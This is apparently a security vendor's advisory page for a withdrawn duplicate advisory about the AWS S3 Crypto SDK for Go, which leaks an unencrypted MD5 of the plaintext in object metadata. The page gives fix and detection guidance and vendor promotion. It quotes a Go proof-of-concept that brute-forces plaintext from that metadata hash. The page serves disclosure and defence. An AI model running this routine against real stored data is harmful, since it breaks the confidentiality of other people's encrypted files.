How severe is GHSA-76wf-9vgp-pj7w?

No CVSS score has been assigned to GHSA-76wf-9vgp-pj7w yet. Review the advisory details and affected package list to assess your exposure.

Which packages are affected by GHSA-76wf-9vgp-pj7w?

GHSA-76wf-9vgp-pj7w affects the following packages: github.com/aws/aws-sdk-go (Go). Ecosystems affected: Go.

How do I fix GHSA-76wf-9vgp-pj7w?

Update github.com/aws/aws-sdk-go to 1.34.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-76wf-9vgp-pj7w is resolved across your whole dependency graph.

How do I detect GHSA-76wf-9vgp-pj7w in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/aws/aws-sdk-go. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-76wf-9vgp-pj7w if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-76wf-9vgp-pj7w?

O3 pinpoints whether GHSA-76wf-9vgp-pj7w is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-76wf-9vgp-pj7w actively exploited in the wild?

Yes. There are 1 known exploit references for GHSA-76wf-9vgp-pj7w, including 1 in-the-wild exploitation observed on GitHub and other sources. Treat this as actively exploitable and prioritize patching immediately. All exploit code should only be run in an isolated sandbox environment for research or authorized testing — never against production systems without explicit written authorization.

What is the EPSS score for GHSA-76wf-9vgp-pj7w?

GHSA-76wf-9vgp-pj7w has an EPSS (Exploit Prediction Scoring System) score of 0.5%, placing it in the 38th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-76wf-9vgp-pj7w?

GHSA-76wf-9vgp-pj7w is classified as CWE-326 (CWE-326). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation.

When was GHSA-76wf-9vgp-pj7w published, and has it been updated?

GHSA-76wf-9vgp-pj7w was published on February 11, 2022 and was last updated on February 4, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

Withdrawn — this advisory has been retracted

🐹 Go

GHSA-76wf-9vgp-pj7w

Duplicate Advisory: Unencrypted md5 plaintext hash in metadata in AWS S3 Crypto SDK for golang

Also known asCVE-2022-2582 GHSA-6jvc-q2x7-pchvGO-2022-0391

Published

Feb 11, 2022

Updated

Feb 4, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

1 known

EPSS Exploitation Probability

via FIRST.org ↗

0.5%probability of exploitation in next 30 days

Lower Risk38th percentile+0.41%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐹github.com/aws/aws-sdk-go

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-6jvc-q2x7-pchv. This link is maintained to preserve external references.

Original Description

Summary

The golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.

Specific Go Packages Affected

github.com/aws/aws-sdk-go/service/s3/s3crypto

Risk/Severity

The vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.

Impact

The issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.

The S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.

The issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.

Mitigation

The header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.

Proof of concept

A Proof of concept is available in a separate github repository, this particular issue can be found at here:

func HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {
	_, header, err := input.S3Mock.GetObjectDirect(bucket, key)
	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
	plaintextMd5 := header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Md5")
	blocks := length / 16
	possiblePlaintextNum := 1
	segNum := len(input.PossiblePlaintextSegments)
	for i := 0; i < blocks; i++ {
		possiblePlaintextNum *= segNum
	}
	for i := 0; i < possiblePlaintextNum; i++ {
		w := i
		guess := ""
		for j := 0; j < blocks; j++ {
			guess += input.PossiblePlaintextSegments[w%segNum]
			w /= segNum
		}
		guessMd5 := md5.Sum([]byte(guess))
		if plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {
			return guess, nil
		}
	}
	return "", fmt.Errorf("No plaintext found!")
}

The PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/aws/aws-sdk-go`	all versions	1.34.0

Exploits & PoCs

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongsi…

pkg.go.devNVDJan 2023

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/aws/aws-sdk-go. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/aws/aws-sdk-go to 1.34.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-76wf-9vgp-pj7w is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-76wf-9vgp-pj7w is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-76wf-9vgp-pj7w. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-6jvc-q2x7-pchv. This link is maintained to preserve external references. ## Original Description ### Summary The golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key. ### Specific Go Packages Affected github.com/aws/aws-sdk-go/service/s3/s3crypto ### Risk/Severity The vulnerability poses insider risks/privilege escalation risks, circumve

O3 Security · Impact-Aware SCA

Is GHSA-76wf-9vgp-pj7w in your dependencies?

O3 detects GHSA-76wf-9vgp-pj7w across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works